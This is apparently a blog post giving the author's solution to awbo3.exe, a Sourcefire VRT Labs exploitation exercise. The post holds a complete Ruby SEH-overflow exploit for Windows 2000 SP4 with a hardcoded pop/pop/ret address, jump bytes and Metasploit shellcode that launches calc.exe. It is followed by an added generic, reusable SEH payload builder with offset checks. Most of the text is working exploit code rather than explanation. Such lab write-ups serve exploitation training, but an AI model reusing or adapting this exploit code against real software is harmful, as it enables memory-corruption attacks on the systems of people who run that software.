hammackj

Solution: awbo3.exe - Windows 2000 SP4 R1

After a very hectic week I was able to sit down and work on awbo3.exe from the Sourcefire VRT Labs. Since the rules state no static return stack addresses or NOP sleds, it took me a little bit longer to get this one working correctly. I had to get an assist on the backwards jump from mc, but once I figured that trick out it was easy. I don't have a copy of Windows XP SP2 installed, but I will post the solution for XP as soon as I can get SP2 installed. I have the NOP-slide version commented out below; it was a bit easier to make than the specific-spacing version, and it is probably more reliable as well. If anyone is interested in the details of how this SEH overflow worked, let me know and I will write up a detailed post on how everything worked.

#!/usr/bin/env ruby
# -*- coding: binary -*-
#(binary source encoding keeps the "\x.." literals and the pack() output as raw
# bytes, so Ruby 1.9+ does not raise Encoding::CompatibilityError on the + below)

#Jacob Hammack
#jacob.hammack@hammackj.com
#exploit for awbo3.exe from Sourcefire VRT labs, Windows 2000 SP4 Rollup 1

poppopret = [0x77fb3326].pack('V') #ntdll.dll pop esi pop ebx ret, w2ksp4r1

#121 bytes, metasploit exec calc.exe
shellcode =
"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" +
"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01" +
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2" +
"\xeb\xf4\x3b\x54\x24\x04\x75\xe5\x8b\x5f\x24\x01\xeb\x66" +
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89" +
"\x5c\x24\x04\xc3\x5f\x31\xf6\x60\x56\x64\x8b\x46\x30\x8b" +
"\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\x89\xf8\x83\xc0\x6a" +
"\x50\x68\xf0\x8a\x04\x5f\x68\x98\xfe\x8a\x0e\x57\xff\xe7" +
"\x63\x61\x6c\x63\x2e\x65\x78\x65\x00"

nseh = "\xEB\x06\x90\x90"          #jmp short +6: skips the two nops and the 4-byte SEH pointer, lands on stage1
seh = poppopret                    #overwritten handler: pop/pop/ret returns execution into nseh
stage1 = [0xe8, -1024].pack('CV')  #call rel32, 1024 bytes backwards into the buffer, thx mc~
#the call sits at buffer offset 1092 and rel32 counts from the end of the 5-byte
#instruction (offset 1097), so it lands at offset 73: inside the "A" padding,
#where 0x41 = inc ecx executes as a harmless slide into the shellcode at 120

#Vuln triggers at 1084, so we need buffer padding before the shellcode,
#in this case 120 bytes, then the shellcode, and the rest of the buffer in
#A's, so 843 for the rest of 1084 (120 + 121 + 843 = 1084)
payload = "A" * 120 + shellcode + "A"  * 843 + nseh + seh + stage1
#payload ="\x90" * (1084 - shellcode.length) + shellcode  + nseh + seh + stage1

$stdout.binmode #don't let the OS translate any of the bytes on the way out
print payload
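To make the offset arithmetic behind the short jump and the backwards call explicit, here is the same SEH-overwrite layout as a reusable builder with checks. This is an added example of mine, not the original exploit and not anything from the VRT lab; the function names are my own, the 121-byte shellcode is replaced by a constructed block of int3 bytes of the same size, and the rule that the filler must decode as 0x90 (nop) or 0x41 (inc ecx) is my sanity check, not something the challenge states.

```ruby
# Added example: generic SEH-overwrite payload builder with jump arithmetic checks.
# Not the original exploit; the placeholder shellcode below is constructed.

# Encode a 5-byte near call (0xE8) or jmp (0xE9) with a signed rel32 displacement.
# pack('V') reduces a negative displacement to its 32-bit two's complement.
def rel32_insn(opcode, displacement)
  [opcode, displacement].pack('CV')
end

# nSEH slot: jmp short +6 over the two nops and the 4-byte SEH pointer.
NSEH_JMP_SHORT = "\xEB\x06\x90\x90".b

# Layout: filler | shellcode | filler | nSEH | SEH | stage1 (call back into the buffer)
# overflow_len is the number of bytes that reaches the nSEH slot (1084 for awbo3.exe).
def build_seh_payload(overflow_len:, shellcode:, shellcode_offset:, handler:, jump_back:, filler: "A")
  shellcode = shellcode.b
  if shellcode_offset + shellcode.bytesize > overflow_len
    raise ArgumentError, "shellcode runs into the SEH record"
  end
  pre  = (filler * shellcode_offset).b
  post = (filler * (overflow_len - shellcode_offset - shellcode.bytesize)).b
  pre + shellcode + post + NSEH_JMP_SHORT + [handler].pack('V') + rel32_insn(0xE8, jump_back)
end

# Buffer offset of stage1, the backwards call that follows nSEH (4) and SEH (4).
def stage1_offset(overflow_len)
  overflow_len + 4 + 4
end

# Where the short jump in nSEH lands: rel8 counts from the end of the 2-byte jmp.
def nseh_jump_target(overflow_len)
  overflow_len + 2 + 6
end

# Where the backwards call lands: rel32 counts from the end of the 5-byte call.
def landing_offset(overflow_len, jump_back)
  stage1_offset(overflow_len) + 5 + jump_back
end

# Sanity check on the layout: the short jump must reach stage1, and the call
# must land either exactly on the shellcode or in the filler before it, in which
# case the filler has to be a single-byte no-op (0x90 nop or 0x41 inc ecx).
def layout_ok?(overflow_len:, shellcode_offset:, jump_back:, filler: "A")
  return false unless nseh_jump_target(overflow_len) == stage1_offset(overflow_len)
  land = landing_offset(overflow_len, jump_back)
  return false if land < 0 || land > shellcode_offset
  return true if land == shellcode_offset
  filler.bytesize == 1 && [0x90, 0x41].include?(filler.bytes.first)
end

# Constructed placeholder: 121 int3 bytes, the size of the calc.exe payload above.
SAMPLE_SHELLCODE = ("\xcc" * 121).b

# The page's parameters: 1084 bytes to nSEH, shellcode at 120, ntdll pop/pop/ret,
# call 1024 bytes backwards (lands at offset 73, inside the inc ecx slide).
def demo_payload
  build_seh_payload(overflow_len: 1084, shellcode: SAMPLE_SHELLCODE, shellcode_offset: 120,
                    handler: 0x77fb3326, jump_back: -1024)
end

if __FILE__ == $0
  $stdout.binmode
  print demo_payload
end
```

Swapping in the real shellcode and a NOP filler with `shellcode_offset: 1084 - shellcode.bytesize` reproduces the commented-out slide variant; `layout_ok?` accepts that too, and rejects a shellcode offset small enough that the call would land in the middle of the shellcode.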